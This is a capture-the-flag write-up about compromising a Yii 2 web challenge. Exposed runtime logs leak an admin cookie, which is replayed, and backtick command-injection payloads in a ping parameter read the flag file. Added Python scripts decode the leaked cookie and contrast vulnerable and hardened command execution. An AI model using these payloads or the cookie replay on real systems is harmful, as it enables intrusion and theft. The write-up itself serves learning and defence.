Contents
  1. Preface
  2. Solutions

Small competition writeup

Preface

An internal competition; I was just helping look at the challenges. Another exhausting day. If the chance comes I hope to get recruited and settle down :). Just a brief record of it.

Solutions

  • The internal competition had over 900 participants; quite lively.
  • Challenge analysis: every person's flag file is different. Presumably a random handful of people share the same flag file, i.e. a random handful get the same challenge environment.
  • Submitting someone else's flag gets you reported and your IP looked up, haha.
  • The challenge environments are one-click Docker deployments, and the web challenges all ship with the default config's directory-listing vulnerability, orz.
  • Took first blood on one of the relatively hard challenges and got a phone call from the Beijing side telling me not to leak the challenge, omg.

Writeup
[Comprehensive penetration test]
The comprehensive penetration challenge I took first blood on. The intranet machine had no tools, which hurt. After some simple testing: a simple CMS, not much usable information on the perimeter, and I didn't find anything useful, so in the end I copied over a wordlist and ran it with Burp, which turned up README.md. I'll just paste the information that was useful; the site's directory structure is as follows:
Since the web challenges visited earlier all allowed directory listing, I went through them one by one.

assets/             contains assets definition
commands/           contains console commands (controllers)
config/             contains application configurations
controllers/        contains Web controller classes
mail/               contains view files for e-mails
models/             contains model classes
runtime/            contains files generated during runtime
tests/              contains various tests for the basic application
vendor/             contains dependent 3rd-party packages
views/              contains view files for the Web application
web/                contains the entry script and Web resources

Eventually this turned up. (The directory layout above is that of the Yii 2 basic application template, and the $_SERVER dump below is the request context that Yii's file log target appends to its log under runtime/logs/; with directory listing on, that log exposes other users' requests, cookies included.) Searching it for the keyword flag gives:

$_SERVER = [
'HTTP_HOST' => '192.168.159.198'
'HTTP_CONNECTION' => 'keep-alive'
'HTTP_UPGRADE_INSECURE_REQUESTS' => '1'
'HTTP_USER_AGENT' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36'
'HTTP_ACCEPT' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'
'HTTP_REFERER' => 'http://192.168.159.198/web/index.php?r=upload%2Findex&cmd=127.0.0.2%25ffcat++%2Fflag&submit=%E5%8F%91%E9%80%81'
'HTTP_ACCEPT_ENCODING' => 'gzip, deflate'
'HTTP_ACCEPT_LANGUAGE' => 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'
'HTTP_COOKIE' => 'PHPSESSID=j5dmksk0q890qifkbbm5pt6s01; _csrf=uitUWyNkbS-0dWeRkLcxa1oDy2umSQ56; cib=a%3A3%3A%7Bs%3A2%3A%22id%22%3Bi%3A1%3Bs%3A4%3A%22name%22%3Bs%3A6%3A%22system%22%3Bs%3A4%3A%22sign%22%3Bs%3A32%3A%221966e92fca2cc5de6ba0a9f7b8d3b7c6%22%3B%7D'
'PATH' => '/sbin:/usr/sbin:/bin:/usr/bin'
'SERVER_SIGNATURE' => '<address>Apache/2.2.15 (CentOS) Server at 192.168.159.198 Port 80</address>
'
'SERVER_SOFTWARE' => 'Apache/2.2.15 (CentOS)'
'SERVER_NAME' => '192.168.159.198'
'SERVER_ADDR' => '172.17.0.2'
'SERVER_PORT' => '80'
'REMOTE_ADDR' => '192.168.159.1'
'DOCUMENT_ROOT' => '/var/www/html'
'SERVER_ADMIN' => 'root@localhost'
'SCRIPT_FILENAME' => '/var/www/html/web/index.php'
'REMOTE_PORT' => '13082'
'GATEWAY_INTERFACE' => 'CGI/1.1'
'SERVER_PROTOCOL' => 'HTTP/1.1'
'REQUEST_METHOD' => 'GET'
'QUERY_STRING' => 'r=upload%2Findex&cmd=127.0.0.1%60tac+%2Ffla*%60&submit=%E5%8F%91%E9%80%81'
'REQUEST_URI' => '/web/index.php?r=upload%2Findex&cmd=127.0.0.1%60tac+%2Ffla*%60&submit=%E5%8F%91%E9%80%81'
'SCRIPT_NAME' => '/web/index.php'
'PHP_SELF' => '/web/index.php'
'REQUEST_TIME_FLOAT' => 1545042360.093
'REQUEST_TIME' => 1545042360
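To make the leaked log entry usable, here is an added Python script (not part of the original write-up) that pulls the two interesting fields out of the dump: it URL-decodes QUERY_STRING to recover the injected cmd value exactly as the shell will see it, and decodes the cib cookie, which is a URL-encoded PHP serialize() array carrying an id, a name and a 32-hex-character sign. The two log lines embedded below are copied from the dump above; the php_unserialize helper is a minimal one written for this example and handles only the integer/boolean/string/array types that appear in the cookie.

```python
import re
from urllib.parse import parse_qs, unquote

# Two lines copied from the $_SERVER dump above, used as the sample input.
LOG_FRAGMENT = """
'HTTP_COOKIE' => 'PHPSESSID=j5dmksk0q890qifkbbm5pt6s01; _csrf=uitUWyNkbS-0dWeRkLcxa1oDy2umSQ56; cib=a%3A3%3A%7Bs%3A2%3A%22id%22%3Bi%3A1%3Bs%3A4%3A%22name%22%3Bs%3A6%3A%22system%22%3Bs%3A4%3A%22sign%22%3Bs%3A32%3A%221966e92fca2cc5de6ba0a9f7b8d3b7c6%22%3B%7D'
'QUERY_STRING' => 'r=upload%2Findex&cmd=127.0.0.1%60tac+%2Ffla*%60&submit=%E5%8F%91%E9%80%81'
"""


def server_field(log, name):
    """Return the value of one 'NAME' => 'value' entry from a Yii $_SERVER dump."""
    m = re.search(r"'%s' => '([^']*)'" % re.escape(name), log)
    if not m:
        raise KeyError(name)
    return m.group(1)


def parse_cookie_header(header):
    """Split a Cookie header into a dict, URL-decoding each value."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        cookies[name] = unquote(value)
    return cookies


def php_unserialize(data, pos=0):
    """Minimal PHP unserialize() for i:, b:, s: and a: values, written for this
    example. PHP string lengths are byte counts, so non-ASCII strings or objects
    would need a bytes-aware implementation. Returns (value, next_offset)."""
    kind = data[pos]
    if kind in "ib":
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        return (int(raw) if kind == "i" else raw == "1"), end + 1
    if kind == "s":
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                                   # skip :"
        return data[start:start + length], start + length + 2  # skip ";
    if kind == "a":
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                                     # skip :{
        items = {}
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            value, pos = php_unserialize(data, pos)
            items[key] = value
        return items, pos + 1                               # skip }
    raise ValueError("unsupported type %r at offset %d" % (kind, pos))


def analyze_log(log=LOG_FRAGMENT):
    """Recover the injected command and the decoded cib cookie from the dump."""
    params = parse_qs(server_field(log, "QUERY_STRING"))
    cookies = parse_cookie_header(server_field(log, "HTTP_COOKIE"))
    cib, _ = php_unserialize(cookies["cib"])
    return {
        "route": params["r"][0],
        "cmd": params["cmd"][0],   # the backtick payload, decoded
        "cib": cib,                # {'id': 1, 'name': 'system', 'sign': '...'}
    }


if __name__ == "__main__":
    for key, value in analyze_log().items():
        print("%-6s %r" % (key, value))
```

The decoded cookie is what the write-up reuses to become admin: a serialized array with id 1 and name "system" plus a fixed sign value, sent as-is from the log. Anyone who can read the runtime log can replay it, which is the real lesson of the listable runtime/ directory.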

This looked like a command-execution vulnerability behind admin privileges, so I used the cookie from here directly and visited /index.php.

It turned out I was admin, so I tried command execution:
/web/index.php?r=upload%2Findex&cmd=127.0.0.1%60tac+%2Ffla*%60&submit=%E5%8F%91%E9%80%81
Found that the ping command could be executed, so I built a payload using the one from the log, tested it, and out came the flag. First blood!
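URL-decoded, the cmd value in that request is 127.0.0.1 followed by "tac /fla*" wrapped in backticks. The shell performs the backtick substitution before the ping binary ever sees its argument, so the injected command runs with the web server's privileges and its output ends up in the response. Using tac instead of cat and the glob /fla* instead of the literal path are the usual choices for slipping past a keyword blacklist; the write-up does not say what, if anything, the challenge filtered (the earlier request recorded in HTTP_REFERER tried cat /flag). The following added Python example (not the challenge's code) contrasts the two ways of invoking the command. Function names and the sample inputs are mine, and echo stands in for ping so that nothing touches the network; the injected command is a harmless "echo INJECTED" rather than the log's "tac /fla*", and the shell parses both the same way.

```python
import ipaddress
import subprocess

# Constructed sample inputs. The log payload wrapped `tac /fla*` in backticks;
# here the injected command is a harmless `echo INJECTED` so the demo runs anywhere.
BENIGN = "127.0.0.1"
PAYLOAD = "127.0.0.1`echo INJECTED`"


def run_vulnerable(target):
    """Mimics a handler doing exec("ping -c 1 " . $cmd): the user value is
    pasted into a shell command line. `echo` stands in for ping; the shell
    still performs backtick substitution before the program runs."""
    out = subprocess.run("echo " + target, shell=True,
                         capture_output=True, text=True)
    return out.stdout.strip()


def run_argv_only(target):
    """Argv list, no shell, no validation: metacharacters reach the program
    literally, so nothing is executed, but garbage is still passed through."""
    out = subprocess.run(["echo", target], capture_output=True, text=True)
    return out.stdout.strip()


def validate_target(target):
    """Accept only a syntactically valid IPv4/IPv6 address and return it in
    canonical form. Backticks, ';', '$()', whitespace and a leading '-' (which
    ping would read as an option) all raise ValueError."""
    return str(ipaddress.ip_address(target))


def is_valid_target(target):
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def run_hardened(target):
    """Validate first, then pass the value as a single argv element with no shell."""
    out = subprocess.run(["echo", validate_target(target)],
                         capture_output=True, text=True)
    return out.stdout.strip()


if __name__ == "__main__":
    print("vulnerable:", run_vulnerable(PAYLOAD))   # 127.0.0.1INJECTED
    print("argv only :", run_argv_only(PAYLOAD))    # 127.0.0.1`echo INJECTED`
    print("hardened  :", is_valid_target(PAYLOAD))  # False
```

The argv list alone already stops the injection, but validation is still needed: ping interprets arguments of its own, so a value such as "-c 10 127.0.0.1" would otherwise change the command's behaviour. If the feature has to accept hostnames as well, validate them against a strict allowlist of hostname characters rather than relying on escaping.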
